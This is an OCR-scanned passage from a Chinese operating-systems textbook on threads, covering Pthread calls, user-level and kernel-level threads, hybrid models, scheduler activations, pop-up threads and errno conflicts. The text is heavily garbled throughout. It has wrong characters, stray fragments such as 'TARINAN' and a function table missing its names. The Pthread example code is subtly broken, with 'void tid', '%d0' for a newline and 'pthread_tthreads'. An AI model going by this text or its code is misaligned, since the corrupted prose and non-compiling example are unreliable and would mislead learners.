工作 一 半 的 时 候 ， 发 生 线程 切换 ， 新 线程 也 注意 到 几乎 没有 内 存 了 ， 
并 且 也 开始 分 配 更 多 的 内 存 。 这 样 ， 内 存 可 能 会 分 配 两 次 。 不 过 这 些 
问题 通过 努力 是 可 以 解决 的 。 总 之 ， 要 使 多 线程 的 程序 正确 工作 ， 惑 
需要 仔细 思考 和 设计 。 


2.2.3 POSIX 线程 


为 实现 可 移植 的 线程 程序 ，IEEE 在 IEEE 标 准 1003.1c 中 定义 了 线程 
的 标准 。 它 定义 的 线程 包 叫 做 Pthread。 大 部 分 UNIX 系 统 都 支持 该 标 
准 。 这 个 标准 定义 了 超过 60 个 函数 调用 ， 如 果 在 这 里 列举 一 所 就 太 多 
了 。 取 而 代 之 的 是 ， 我 们 将 仅仅 描述 一 些 主要 的 函数 ， 以 说 明 它 是 如 
何 工作 的 。 图 2-14 中 列举 了 这 些 函 数 调用 。 


线程 调用 
Pthread_create 创建 一 个 新 线程 


TARINAN 


等 待 一 个 特定 的 线程 退出 

释放 CPU 来 运行 另外 一 个 线程 
创建 并 初始 化 一 个 线程 的 属性 结构 
删除 一 个 线程 的 属性 结构 


Rl 2-14 一 些 Pthread 的 函数 调用 


所 有 Pthread 线 程 都 有 某 些 特性 。 每 一 个 都 含有 一 个 标识 件 、 一 组 
寄存 器 (包括 程序 计数 侨 ) 和 一 组 存储 在 结构 中 的 属性 。 这 些 属性 包 
括 堆栈 大 小 、 调 度 参数 以 及 使 用 线程 需要 的 其 他 项 目 。 


创建 一 个 新 线程 需要 使 用 pthread_create 调 用 。 新 创建 的 线程 的 线程 
标识 符 作 为 函数 值 返 回 。 这 种 调用 有 意 看 起 来 很 像 fork 系 统 调用 ， 其 中 
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用 中 引用 的 线程 。 


当 一 个 线程 完成 分 配给 它 的 工作 时 ， 可 以 通过 调用 pthread_exit 来 
终止 。 这 个 调用 终止 该 线程 并 释放 它 的 栈 。 


一 般 一 个 线程 在 继续 运行 前 需要 等 待 
退出 。 可 以 通过 pthread_join 线 程 调 用 来 等 
等 竺 线程 的 线程 标识 符 作 为 一 个 参数 给 


另 一 个 线程 完成 它 的 工作 并 
待 别 的 特定 线程 的 终止 。 而 
出 o 


有 时 会 出 现 这 种 情况 : 一 个 线程 逻辑 上 没有 阻 蹇 ， 但 感觉 上 它 已 
经 运行 了 足够 长 时 间 并 且 布 望 给 另外 一 个 线程 机 会 去 运行 。 这 时 可 以 
通过 调用 pthread_yield 完 成 这 一 目标 。 而 进程 中 没有 这 种 调用 ， 因 为 假 
设 进 程 间 会 有 激烈 的 竞争 性 ， 并 且 每 一 个 进程 都 希望 获得 它 所 能 得 到 
的 所 有 的 CPU 时 间 。 但 是 ， 由 于 同一 进程 中 的 线程 可 以 同时 工作 ， 并 
且 它们 的 代码 总 是 由 同一 个 程序 员 编 写 的 ， 因 此 ， 有 时 程序 员 希 望 它 
们 能 互相 给 对 方 一 些 机 会 去 运行 。 


下 面 两 个 线程 调用 是 处 理 属性 的 。Pthread_attr_init 建 立 关 联 一 个 线 
程 的 属性 结构 并 初始 化 成 默认 值 。 这 些 值 (例如 优先 级 ) 可 以 通过 修 
改 属性 结构 中 的 域 值 来 改变 。 


最 后 ，pthread_attr_destroy 删 除 一 个 线程 的 属性 结构 ， 释 放 它 占用 
的 内 存 。 它 不 会 影响 调用 它 的 线程 。 这 些 线程 会 继续 存在 。 


为 了 更 好 地 了 解 Pthread 是 如 何 工 作 的， 考虑 图 2-15 提 供 的 简单 例 
子 。 这 里 主 程序 在 宣布 它 的 意图 之 后 ， 循 环 NUMBER_OF_THREADS 
次 ， 每 次 创建 一 个 新 的 线程 。 如 果 线 程 创 建 失 败 ， 会 打印 出 一 条 错误 
言 忆 然后 退出 。 在 创建 完 所 有 线程 之 后 ， 主 程序 退 


#include <pthread.h> 
#include <stdio.h> 
#include <stdlib.h> 


#define NUMBER_OF_THREADS 10 


void *print_hello_world(void tid) 

CO 产 本 函数 输出 线程 的 标识 符 ， 然 后 退出 。 */ 
printf("Hello World. Greetings from thread %d0, tid); 
pthread_exit(NULL); 

} 


int main(int argc, char *argv[]) 
UO 疡 主 程序 创建 10 个 线程 ， 然 后 退出 。 */ 


pthread_tthreads[NUMBER_OF_THREADS]; 
int status, i; 


for(i=0; i < NUMBER_OF_THREADS; i++) { 
printf("Main here. Creating thread %d0, i); 
status = pthread_create(&threads[i], NULL, print_hello_world, (void *)i); 


if (status != 0) { 
printf("Oops. pthread_create returned error code %d0, status); 
exit(-1); 

} 


} 
exit(NULL); 


图 2-15 使 用 线程 的 一 个 例子 程序 


当 创建 一 个 线程 时 ， 它 打印 一 条 一 行 的 发 布 信息 ， 然 后 退出 。 这 
些 不 同 信息 交错 的 顺序 是 不 确定 的 ， 并 且 可 能 在 连续 运行 程序 的 情况 
PREDE 


前 面 摘 述 的 Pthread 调 用 无 论 如 何 也 不 是 屈指 可 数 的 这 几 个 ， 还 有 
许多 的 调用 。 我 们 会 在 讨论 “进程 与 线程 同步 ”之 后 再 来 研究 其 他 一 些 
Pthread 调 用 。 


2.2.4 在 用 户 空 间 中 实现 线程 


有 两 种 主要 的 方法 实现 线程 包 : 在 用 户 空间 中 和 在 内 核 中 。 这 两 
种 方法 互 有 利 浆 ， 不 过 混合 实现 方式 也 是 可 能 的 。 我 们 现在 介绍 这 些 
方法 ， 并 分 析 它 们 的 优点 和 缺点 。 


第 一 种 方法 是 把 整个 线程 包 放 在 用 户 空间 中 ， 内 核对 线程 包 一 无 
所 知 。 从 内 核 角 度 考虑 ， 就 是 按 正 党 的 方式 管理 ， 即 单线 程 进 程 。 这 
种 方法 第 一 个 ， 也 和 是 最 明显 的 优点 是 ， 用 户 级 线程 包 可 以 在 不 文 持 线 
程 的 操作 系统 上 实现 。 过 去 所 有 的 操作 系统 都 属于 这 个 范围 ， 即 使 现 
在 也 有 一 些 操 作 系 统 还 是 不 文 持 线 程 。 通 过 这 一 方法 ， 可 以 用 函数 库 
实现 线程 。 


所 有 的 这 类 实现 都 有 同样 的 通用 结构 ， 如 图 2-16a 所 示 。 线 程 在 一 
个 运行 时 系统 的 顶部 运行 ， 这 个 运行 时 系统 是 一 个 管理 线程 的 过 程 的 
集合 。 我 们 已 经 见 过 其 中 的 四 个 过 程 : pthread_create，pthread_exit， 
pthread_join 和 pthread_yield。 不 过 ， 一 般 还 会 有 更 多 的 过 程 。 
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内 核 空间 {| /wt F | ap) 
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a) b) 
图 2-16 a) 用 户 级 线程 包 ; b) 由 内 核 管理 的 线程 包 


在 用 户 空 间 管理 线程 时 ， 每 个 进程 需要 有 其 专用 的 线程 表 (thread 
table) ， 用 来 跟踪 该 进程 中 的 线程 。 这 些 表 和 内 核 中 的 进程 表 类 似 ， 
不 过 它 仅 仪 记录 各 个 线程 的 属性 ， 如 每 个 线程 的 程序 计数 器 、 堆 栈 指 
针 、 寄 存 胡 和 状态 等 。 该 线程 表 由 运行 时 系统 管理 。 当 一 个 线程 转换 
到 就 绪 状 态 或 阻塞 状态 时 ， 在 该 线程 表 中 存放 重新 局 动 该 线程 所 需 的 

， 与 内 核 在 进程 表 中 存放 进程 的 信息 完全 一 样 。 


当 某 个 线程 做 了 一 些 会 引起 在 本 地 阻塞 的 事情 之 后 ， 例 如 ， 等 得 
进程 中 男 一 个 线程 完成 某 项 工作 ， 它 调用 一 个 运行 时 系统 的 过 程 ， 这 
个 过 程 检 查 该 线程 是 否 必须 进入 阻塞 状态 。 如 末 是 ， 它 在 线程 表 中 保 
存 该 线程 的 寄存 器 ( 即 它 本 身 的 ) ， 查 看 表 中 可 运行 的 就 绪 线程 ， 并 
把 新 线程 的 保存 值 重新 狼 入 机 妖 的 寄存 器 中 。 只 要 堆栈 指针 和 程序 计 


数 如 一 被 切换 ， 新 的 线程 束 又 目 动 投 入 运行 。 如 琳 机 右 有 一 条 保存 所 
有 寄存 器 的 指令 和 男 一 条 法 入 全 部 寄存 器 的 指令 ， 那 么 整个 线程 的 切 
换 可 以 在 几 条 指令 内 完成 。 进 行 类 似 于 这 样 的 线程 切换 至 少 比 陷入 内 
核 要 快 一 个 数量 级 (或 许 更 多 ) ， 这 是 使 用 用 户 级 线程 包 的 极 大 的 优 
点 。 


不 过 ， 线 程 与 进程 有 一 个 关键 的 差别 。 在 线程 完成 运行 时 ， 例 
如 ， 在 它 调用 thread_yield 时 ，pthread_yield 代 码 可 以 把 该 线程 的 信息 保 
存在 线程 表 中 ， 进 而 ， 它 可 以 调用 线程 调度 程序 来 选择 另 一 个 要 运行 
的 线程 。 保 存 该 线程 状态 的 过 程 和 调度 程序 都 只 是 本 地 过 程 ， 所 以 启 
动 它们 比 进行 内 核 调 用 效率 更 高 。 另 一 方面 ， 不 需要 陷阱 ， 不 需要 上 
下 文 切换 ， 也 不 需要 对 内 存 高 速 缓存 进行 刷新 ， 这 就 使 得 线程 调度 非 
常 快捷 。 


用 户 级 线程 还 有 男 一 个 优点 。 它 允许 每 个 进程 有 上 自己 定制 的 调度 
算法 。 例 如 ， 在 某 些 应 用 程序 中 ， 那 些 有 垃圾 收集 线程 的 应 用 程序 谍 
不 用 担心 线程 会 在 不 合适 的 时 刻 停止 ， 这 是 一 个 长 处 。 用 户 级 线程 还 
具有 较 好 的 可 扩展 性 ， 这 是 因为 在 内 核 空 间 中 内 核 线程 需要 一 些 固 定 
表格 空间 和 堆栈 空间 ， 如 琳 内 核 线程 的 数量 非常 大 ， 束 会 出 现 问 题 。 


尽管 用 户 级 线程 包 有 更 好 的 性 能 ， 但 它 也 存在 一 些 明 显 的 问题 。 
其 中 第 一 个 问题 是 如 何 实现 阻塞 系统 调用 。 假 设 在 还 没有 任何 击 键 之 
前 ， 一 个 线程 读 取 刍 盘 。 让 该 线程 实际 进行 该 系统 调用 是 不 可 接受 


的 ， 因 为 这 会 停止 所 有 的 线程 。 使 用 线程 的 一 个 主要 目标 是 ， 首 先 要 
允许 每 个 线程 使 用 阻塞 调用 ， 但 是 还 要 人 避免 被 阻塞 的 线程 影响 其 他 的 
线程 。 有 了 阻塞 系统 调用 ， 这 个 目标 不 是 轻易 地 能 够 实现 的 。 


系统 调用 可 以 全 部 改 成 非 阻塞 的 〈 例 如 ， 如 果 没 有 被 缓冲 的 字 
符 ， 对 键盘 的 read 操 作 可 以 只 返回 0 字 节 ) ， 但 是 这 需要 修改 操作 系 
统 ， 所 以 这 个 办 法 也 不 吸引 人 。 而 且 ， 用 户 级 线程 的 一 个 长 处 束 古 它 
可 以 在 现 有 的 操作 系统 上 运行 。 男 外 ， 改 变 read 操 作 的 语义 需要 修改 许 
多 用 户 程序 。 


在 这 个 过 程 中 ， 还 有 一 种 可 能 的 蔡 代 方案 ， 就 是 如 果 某 个 调用 会 
阻塞 ， 台 提前 通知 。 在 某 些 UNIX 版 本 中 ， 有 一 个 系统 调用 select 可 以 允 
许 调用 者 通知 预期 的 read 是 否 会 阻塞 。 知 有 这 个 调用 ， 那 么 库 过 程 read 
就 可 以 被 新 的 操作 替代 ， 首 先进 行 select 调 用 ， 然 后 只 有 在 安全 的 情形 
下 ( 即 不 会 阻塞 ) 才 进 行 read 调 用 。 如 果 read 调 用 会 被 阻塞 ， 有 关 的 调 
用 就 不 进行 ， 代 之 以 运行 男 一 个 线程 。 到 了 下 次 有 关 的 运行 系统 取得 
控制 权 之 后 ， 就 可 以 再 次 检查 看 看 现在 进行 read 调 用 是 否 安 全 。 这 个 处 
理 方法 需要 重 写 部 分 系统 调用 库 ， 所 以 效率 不 高 也 不 优雅 ， 不 过 没有 
其 他 的 可 选 方案 了 。 在 系统 调用 周围 从 事 检查 的 这 类 代码 称 为 包 套 

(jacket 或 wrapper) 。 


RAN 


与 阻塞 系统 调用 问题 有 些 类 似 的 是 页 面 故障 问题 。 我 们 将 在 第 3 章 
讨论 这 些 问题 。 此 刻 可 以 认为 ， 把 计算 机 设置 成 这 样 一 种 工作 方式 ， 


即 并 不 是 所 有 的 程序 都 一 次 性 放 在 内 存 中 。 如 果 某 个 程序 调用 或 者 跳 
转 到 了 一 条 不 在 内 存 的 指令 上 ， 束 会 发 生 页 面 故障 ， 而 操作 系统 将 到 
磁盘 上 取 回 这 个 丢失 的 指令 (和 该 指令 的 “邻居 们 ”) ， 这 就 称 为 页 面 
故障 。 在 对 所 需 的 指令 进行 定位 和 读 入 时 ， 相 关 的 进程 就 被 阻塞 。 如 
条 有 一 个 线程 引起 页 面 故 障 ， 内 核 由 于 甚至 不 知道 有 线程 存在 ， 通 秆 
会 把 整个 进程 阻塞 直到 向 盘 IO 完 成 为 止 ， 尽 管 其 他 的 线程 是 可 以 运行 
的 。 


用 户 级 线程 包 的 另 一 个 问题 是 ， 如 采 一 个 线程 开始 运行 ， 那 么 在 
该 进程 中 的 其 他 线程 孢 不 能 运行 ， 除 非 第 一 个 线程 目 动 放弃 CPU。 在 
一 个 单独 的 进程 内 部 ， 没 有 时 钟 中 断 ， 所 以 不 可 能 用 轮转 调度 〈 轮 
流 ) 的 方式 调度 进程 。 除 非 某 个 线程 能 够 按照 自己 的 意志 进入 运行 时 
系统 ， 否 则 调度 程序 就 没有 任何 机 会 。 


对 线程 永久 运行 问题 的 一 个 可 能 的 解决 方案 是 让 运行 时 系统 请 求 
每 秒 一 次 的 时 钟 信 号 (PA) ， 但 是 这 样 对 程序 也 是 生硬 和 无 序 的 。 
不 可 能 总 是 高 频率 地 发 生 周 期 性 的 时 钟 中 断 ， 即 使 可 能 ， 总 的 开销 也 
是 可 观 的 。 而 且 ， 线 程 可 能 也 需要 时 钟 中 断 ， 这 就 会 扰乱 运行 时 系统 
使 用 的 时 钟 。 


再 者 ， 也 许 反 对 用 户 级 线程 的 最 大 负面 争论 意见 是 ， 程 序 员 通常 
在 经 党 发 生 线 程 阻塞 的 应 用 中 才 希 户 使 用 多 个 线程 。 例 如 ， 在 多 线程 
Web 服 务 侨 里 。 这 些 线程 持续 地 进行 系统 调用 ， 而 一 旦 发 生 内 核 陷阱 进 


行 系统 调用 ， 如 琳 原 有 的 线程 已 经 阻塞 ， 殊 很 难 让 内 核 进行 线程 的 切 
换 ， 如 来 要 让 内 核 消除 这 种 情形 ， 丈 要 持续 进行 Select 系 统 调 用 ， 以 便 
仿 查 read 系 统 调 用 是 否 安 全 。 对 于 那些 基本 上 是 CPU 密 集 型 而 且 极 少 有 
阻塞 的 应 用 程序 而 言 ， 使 用 多 线程 的 目的 又 何在 呢 ? 由 于 这 样 的 做 法 
并 不 能 得 到 任何 益处 ， 所 以 没有 人 会 真正 提出 使 用 多 线程 来 计算 前 n 个 
素数 或 者 下 象棋 等 一 类 工作 。 


2.2.5 ”在 内 核 中 实现 线程 


现在 我 们 研究 内 核 了 解 和 管理 线程 的 情形 。 如 图 2-16b 所 示 ， 此 时 
不 再 需要 运行 时 系统 了 。 男 外 ， 每 个 进程 中 也 没有 线程 表 。 相 反 ， 在 
内 核 中 有 用 来 记录 系统 中 所 有 线程 的 线程 表 。 当 某 个 线程 希望 创建 一 
个 新 线程 或 撤销 一 个 已 有 线程 时 ， 它 进行 一 个 系统 调用 ， 这 个 系统 调 
用 通过 对 线程 表 的 更 新 完成 线程 创建 或 撤销 工作 。 


内 核 的 线程 表 保存 了 每 个 线程 的 寄存 万 、 状 态 和 其 他 信息 。 这 些 
信息 和 在 用 户 空 间 中 (在 运行 时 系统 中 ) 的 线程 是 一 样 的 ， 但 是 现在 
保存 在 内 核 中 。 这 些 信 息 是 传统 内 核 所 维护 的 每 个 单线 程 进程 信息 
( 即 进程 状态 ) 的 子 集 。 男 外 ， 内 核 还 维护 了 传统 的 进程 表 ， 以 便 跟 
踩 进程 的 状态 。 


所 有 能 够 阻塞 线程 的 调用 都 以 系统 调用 的 形式 实现 ， 这 与 运行 时 
系统 过 程 相 比 ， 代 价 征 相当 可 观 的 。 当 一 个 线程 阻塞 时 ， 内 核 根 据 其 
选择 ， 可 以 运行 同一 个 进程 中 的 另 一 个 线程 CRA SE) 或 
者 运行 男 一 个 进程 中 的 线程 。 而 在 用 户 级 线程 中 ， 运 行 时 系统 始终 运 
行 目 己 进程 中 的 线程 ， 直 到 内 核 剥夺 它 的 CPU (或 者 没有 可 运行 的 线 
程 存在 了 ) 为 止 。 


由 于 在 内 核 中 创建 或 撤销 线程 的 代价 比较 大 ， 某 些 系统 采取 * 环 
保 ?” 的 处 理 方式 ， 回 收 其 线程 。 当 某 个 线程 被 撤销 时 ， 融 把 它 标志 为 不 
可 运行 的 ， 但 是 其 内 核 数据 结构 没有 受到 影响 。 稍 后 ， 在 必须 创建 一 
个 新 线程 时 ， 束 重新 启动 某 个 旧 线 程 ， 从 而 节省 了 一 些 开销 。 在 用 户 
级 线程 中 线程 回收 也 是 可 能 的 ， 但 是 由 于 其 线程 管理 的 代价 很 小 ， 所 
以 没有 必要 进行 这 项 工作 。 


内 核 线程 不 需要 任何 新 的 、 非 阻塞 系统 调用 。 另 外 ， 如 果 某 个 进 
程 中 的 线程 引起 了 页 面 故 障 ， 内 核 可 以 很 方便 地 检查 该 进程 是 否 有 任 
何其 他 可 运行 的 线程 ， 如 果 有 ， 在 等 待 所 需要 的 页 面 从 磁盘 读 和 时， 
吕 选 择 一 个 可 运行 的 线程 运行 。 这 样 做 的 主要 缺点 是 系 统 调用 的 代价 
比较 大 ， 所 以 如 果 线 程 的 操作 〈 创 建 、 终 止 等 ) 比较 多 ， 就 会 带 来 很 
大 的 开销 。 


虽然 使 用 内 核 线 程 可 以 解决 很 多 问题 ， 但 是 不 会 解决 所 有 的 问 
题 。 例 如 ， 当 一 个 多 线程 进程 创建 新 的 进程 时 ， 会 发 生 什 么 ? 新 进程 
征 拥有 与 原 进程 相同 数量 的 线程 ， 还 是 只 有 一 个 线程 ? 在 很 多 情况 
下 ， 最 好 的 选择 取决 于 进程 计划 下 一 步 做 什么 。 如 采 它 要 调用 exec 来 
局 动 一 个 新 的 程序 ， 或 许 一 个 线程 是 正确 的 选择 ， 但 是 如 果 它 继续 执 
行 ， 则 应 该 复制 所 有 的 线程 。 


男 一 个 话题 是 信号。 回忆 一 下 ， 信 和 号 是 发 给 进程 而 不 十 线程 的 ， 
至 少 在 经 典 模型 中 是 这 样 的 。 当 一 个 信和 号 到 达 时 ， 应 该 由 哪 一 个 线程 


处 理 它 ? 线程 可 以 “注册 ”它们 感 兴趣 的 某 些 信号 ， 因 此 当 一 个 信号 到 

达 的 时 候 ， 可 把 它 交 给 需要 它 的 线程 。 但 是 如 果 两 个 或 更 多 的 线程 注 
册 了 相同 的 信号 ， 会 发 生 什么 ? 这 只 是 线程 引起 的 问题 中 的 两 个 ， 但 
是 还 有 更 多 的 问题 。 


2.2.6 混合 实现 


人 们 已 经 研究 了 各 种 试图 将 用 户 级 线程 的 优点 和 内 核 级 线程 的 优 
点 结合 起 来 的 方法 。 一 种 方法 是 使 用 内 核 级 线程 ， 然 后 将 用 户 级 线程 
与 某 些 或 者 全 部 内 核 线程 多 路 复 用 起 来 ， 如 图 2-17 所 示 。 如 采 采 用 这 
种 方法 ， 编 程 人 员 可 以 决定 有 多 少 个 内 核 级 线程 和 多 少 个 用 户 级 线程 
彼此 多 路 复 用 。 这 一 模型 市 来 最 大 的 灵活 度 。 


多 用 户 线程 对 应 一 个 内 核 线程 


2-17 用 户 级 线程 与 内 核 线 程 多 路 复 用 


采用 这 种 方法 ， 内 核 只 识别 内 核 级 线程 ， 并 对 其 进行 调度 。 其 中 
一 些 内 核 级 线程 会 被 多 个 用 户 级 线程 多 路 复 用 。 如 同 在 没有 多 线程 能 
力 操作 系统 中 某 个 进程 中 的 用 户 级 线程 一 样 ， 可 以 创建 、 撤 销 和 调度 


这 些 用 户 级 线程 。 在 这 种 模型 中 ， 每 个 内 核 级 线程 有 一 个 可 以 轮流 使 
用 的 用 户 级 线程 集合 。 


2.2.7 ”调度 程序 激活 机 制 


尽管 内 核 级 线程 在 一 些 关 键 点 上 优 于 用 户 级 线程 ， 但 无 可 争议 的 
是 内 核 级 线程 的 速度 慢 。 因 此 ， 研 究 人 员 一 直 在 寻找 在 保持 其 优良 特 
性 的 前 提 下 改进 其 速度 的 方法 。 下 面 我 们 将 介绍 Anderson 等 
(1992) 设计 的 这 样 一 种 方法 ， 称 为 调度 程序 激活 (scheduler 
activation) 机 制 。Edler 等 人 (1988) 以 及 Scott 等 人 (1990) 就 相关 的 
工作 进行 了 深入 讨论 。 


调度 程序 激活 工作 的 目标 是 模拟 内 核 线程 的 功能 ， 但 是 为 线程 包 
提供 通 瘦 在 用 户 空间 中 才能 实现 的 更 好 的 性 能 和 更 大 的 灵活 性 。 特 别 
地 ， 如 采用 户 线 程 从 事 某 种 系统 调用 时 是 安全 的 ， 那 束 不 应 该 进行 专 
门 的 非 阻塞 调用 或 者 进行 提前 检查 。 无 论 如 何 ， 如 果 线 程 阻塞 在 某 个 
系统 调用 或 页 面 故 障 上 ， 只 要 在 同一 个 进程 中 有 任何 束 绪 的 线程 ， 整 
应 该 有 可 能 运行 其 他 的 线程 。 


由 于 避免 了 在 用 户 空 间 和 内 核 空间 之 间 的 不 必要 转换 ， 从 而 提高 
了 效率 。 例 如 ， 如 采 某 个 线程 由 于 等 待 另 一 个 线程 的 工作 而 阻塞 ， 此 
时 没有 理由 请 求 内 核 ， 这 样 束 减少 了 内 核 -用户 转 换 的 开销 。 用 户 鹤 间 
的 运行 时 系统 可 以 阻塞 同步 的 线程 而 另外 调度 一 个 新 线 程 。 


当 使 用 调度 程序 激活 机 制 时 ， 内 核 给 每 个 进程 安排 一 定数 量 的 虚 
拟 处 理 器 ， 并 且 让 (用 户 空间 ) 运行 时 系统 将 线程 分 配 到 处 理 器 上 。 
这 一 机 制 也 可 以 用 在 多 处 理 器 中 ， 此 时 虚拟 处 理 器 可 能 成 为 真实 的 
CPU 。 分 配给 一 个 进程 的 虚拟 处 理 吉 的 初始 数量 是 一 个 ， 但 是 该 进程 
可 以 申请 更 多 的 处 理 器 并 且 在 不 用 时 退回 。 内 核 也 可 以 取 回 已 经 分 配 
出 去 的 虚拟 处 理 右 ， 以 便 把 它们 分 给 需要 更 多 人 处理 右 的 进程 。 


使 该 机 制 工作 的 基本 思路 是 ， 当 内 核 了 解 到 一 个 线程 被 阻塞 之 后 
〈 例 如， 由 于 执行 了 一 个 阻塞 系统 调用 或 者 产生 了 一 个 页 面 故障 ) ， 
内 核 通知 该 进程 的 运行 时 系统 ， 并 且 在 堆栈 中 以 参数 形式 传递 有 问题 
的 线程 编号 和 所 发 生 事 件 的 一 个 描述 。 内 核 通 过 在 一 个 已 知 的 起 始 地 
址 局 动 运行 时 系统 ， 从 而 发 出 了 通知 ， 这 古 对 UNIX 中 信号 的 一 种 粗略 
模拟 。 这 个 机 制 称 为 上 行 调用 (upcall) 。 


一 旦 如 此 激活 ， 运 行 时 系统 忠 重 新 调度 其 线程 ， 这 个 过 程 通常 是 
这 样 的 ， 把 当前 线程 标记 为 阻塞 并 从 整 绪 表 中 取出 男 一 个 线程 ， 设置 
其 寄存 侨 ， 然 后 再 局 动 之 。 稍 后 ， 当 内 核 知 道 原来 的 线程 义 可 运行 时 
(例如 ， 原 移 试图 读 取 的 管道 中 有 了 数据 ， 或 者 已 经 从 磁盘 中 读 入 了 
故障 的 页 面 ) ， 内 核 就 又 一 次 上 行 调用 运行 时 系统 ， 通 知 它 这 一 事 
件 。 此 时 该 运行 时 系统 按照 目 己 的 判断 ， 或 者 立即 重 局 动 被 阻塞 的 线 
程 ， 或 者 把 它 放 入 吏 绪 表 中 稍 后 运行 。 


在 某 个 用 户 线程 运行 的 同时 发 生 一 个 硬件 中 断 时 ， 被 中 断 的 CPU 
切换 进 核心 态 。 如 果 被 中 断 的 进程 对 引起 该 中 断 的 事件 不 感 兴趣 ， 比 
如 ， 是 男 一 个 进程 的 VO 完成 了 ， 那 么 在 中 断 处 理 程序 结束 之 后 ， 整 把 
被 中 断 的 线程 恢复 到 中 断 之 前 的 状态 。 不 过 ， 如 末 该 进程 对 中 断 感 兴 
趣 ， 比 如 ， 有 是 该 进程 中 的 某 个 线程 所 需要 的 页 面 到 达 了 ， 那 么 被 中 断 
的 线程 就 不 再 局 动 ， 代 之 为 挂 起 被 中 断 的 线程 。 而 运行 时 系统 则 局 动 
对 应 的 虚拟 CPU， 此 时 被 中 断 线程 的 状态 你 存在 堆栈 中 。 随 后 ， 运 行 
时 系统 决定 在 该 CPU 上 调度 哪个 线程 : 被 中 断 的 线程 、 新 吏 绪 的 线程 


还 是 某 个 第 三 种 选择 。 


调度 程序 激活 机 制 的 一 个 目标 古 作 为 上 行 调 用 的 信赖 基础 ， 这 是 
一 种 违反 分 讨 次 系统 内 在 结构 的 概念 。 通 遂 ，n 层 提供 n+1 层 可 调用 的 
特定 服务 ， 但 是 n 层 不 能 调用 n+1 层 中 的 过 程 。 上 行 调 用 并 不 遵守 这 个 
基本 原理 。 


2.2.8 弹出 式 线程 


在 分 布 式 系 统 中 经 党 使 用 线程 。 一 个 有 意义 的 例子 是 如 何 处 理 到 
来 的 消 妃 ， 例 如 服务 请 求 。 传 统 的 方法 是 将 进程 或 线程 阻塞 在 一 个 
receive 系 统 调用 上 ， 等 待 消 息 到 来 。 当 消息 到 达 时 ， 该 系统 调用 接收 
消 思 ， 并 打开 消息 检查 其 内 容 ， 然 后 进行 处 理 。 


不 过 ， 也 可 能 有 为 一 种 完全 不 同 的 处 理 方 式 ， 在 该 处 理 方式 中 ， 
一 个 消息 的 到 达 导 致 系统 创建 一 个 处 理 该 消息 的 线程 ， 这 种 线程 称 为 
弹出 式 线程 ， 如 图 2-18 所 示 。 弹 出 式 线程 的 关键 好 处 是 ， 由 于 这 种 线程 
相当 新 ， 没 有 历史 一 一 没有 必须 存储 的 寄存 器 、 堆 栈 诸如 此 类 的 内 
容 ， 每 个 线程 从 全 新 开始 ， 每 一 个 线程 彼此 之 间 都 完全 一 样 。 这 样 ， 
就 有 可 能 快速 创建 这 类 线程 。 对 该 新 线程 指定 所 要 处 理 的 消息 。 使 用 
弹出 式 线程 的 结 末 是 ， 消 奶 到 达 与 处 理 开 始 之 间 的 时 间 非 常 短 。 


弹出 式 线程 ， 为 控制 


进程 to 
到 达 的 消息 而 创建 


现存 线程 


到 达 的 消息 


网 络 
a) b) 
图 2-18 在 消息 到 达 时 创建 一 个 新 的 线程 a) 消息 到 达 之 前 ; b) 消 乱 
到 达 之 后 


在 使 用 弹出 式 线程 之 前 ， 需 要 提前 进行 计划 。 例 如 ， 哪 个 进程 中 
的 线程 先 运行 ? 如 末 系 统 文 持 在 内 核 上 下 文中 运行 线程 ， 线 程 束 有 可 
能 在 那里 运行 (这 是 图 2-18 中 没有 画 出 内 核 的 原因 ) 。 在 内 核 空间 中 运 
行 弹出 式 线程 通常 比 在 用 户 空 间 中 容易 且 快 捷 ， 而 且 内 核 空间 中 的 弹 
出 式 线程 可 以 很 容易 访问 所 有 的 表格 和 LO 设备 ， 这 些 也 许 在 中 断 处 理 
时 有 用 。 而 男 一 方面 ， 出 错 的 内 核 线程 会 比 出 错 的 用 户 线程 造成 更 大 
的 损害 。 例 如 ， 如 果 某 个 线程 运行 时 间 太 长 ， 义 没有 办 法 抢占 它 ， 囊 
可 能 造成 进来 的 信息 丢失 。 


2.2.9 ”使 单线 程 代码 多 线程 化 


许多 已 有 的 程序 是 为 单线 程 进程 编写 的 。 把 这 些 程序 改写 成 多 线 
程 需要 比 直接 写 多 线程 程序 更 高 的 技巧 。 下 面 我 们 考察 一 些 其 中 易 犯 


的 错误 。 


先 考 察 代码 ， 一 个 线程 的 代码 就 像 进程 一 样 ， 通 常 包 含 多 个 过 
程 ， 会 有 局 部 变量 、 全 局 变量 和 过 程 参 数 。 局 部 变量 和 参数 不 会 引起 
任何 问题 ， 但 是 有 一 个 问题 是 ， 对 线程 而 言 是 全 局 变量 ， 并 不 是 对 整 
个 程序 也 是 全 局 的 。 有 许多 变量 之 所 以 是 全 局 的 ， 是 因为 线程 中 的 许 
多 过 程 都 使 用 它们 (如 同 它们 也 可 能 使 用 任何 全 局 变量 一 样 ) ， 但 是 
其 他 线程 在 逻辑 上 和 这 些 变量 无 关 。 


作为 一 个 例子 ， 考 虑 由 UNIX 维 护 的 ermo 变 量 。 当 进程 (或 线 

程 ) 进行 系统 调用 失败 时 ， 错 误 码 会 放 入 errno。 在 图 2-19 中 ， 线 程 1 执 
行 系统 调用 access 以 确定 征 否 人 允许 它 访问 某 个 特定 文件 。 操 作 系统 把 
返回 值 放 到 全 局 变量 errno 里 。 当 控制 权 返 回 到 线程 1 之 后 ， 并 在 线程 1 
读 取 errmo 之 前 ， 调 度 程序 确认 线程 1 此 刻 已 用 完 CPU 时 间 ， 并 决定 切 
换 到 线程 2。 线 程 2 执行 一 个 open 调 用 ， 结 有 末 失 败 ， 导 致 重 写 errno， 于 
古 给 线程 1 的 返回 值 会 永远 丢失 。 随 后 在 线程 1 执行 时 ， 它 将 读 取 错误 
的 返回 值 并 导致 错 广 操 作 。 


线程 ] l 
线程 2 


存 取 (errno 设 置 ) 


<- 一 时 间 


打开 (errno 重 写 ) 


检查 到 的 errno 


2-19 ”线程 使 用 全 局 变量 所 引起 的 错误 


对 于 这 个 问题 有 各 种 解决 方案 。 一 种 解决 方案 旦 全 面 茜 止 全 局 变 
量 。 不 过 这 个 想法 不 一 定 合适 ， 因 为 它 同 许多 已 有 的 软件 冲突 。 男 一 
种 解决 方案 古 为 每 个 线程 赋予 其 私有 的 全 局 变量 ， 如 图 2-20 所 示 。 在 
这 个 方案 中 ， 每 个 线程 有 自己 的 errno 以 及 其 他 全 局 变量 的 私有 副本 ， 
这 样 吏 避 免 了 冲突 。 在 效果 上 ， 这 个 方案 创建 了 新 的 作用 域 层 ， 这 些 
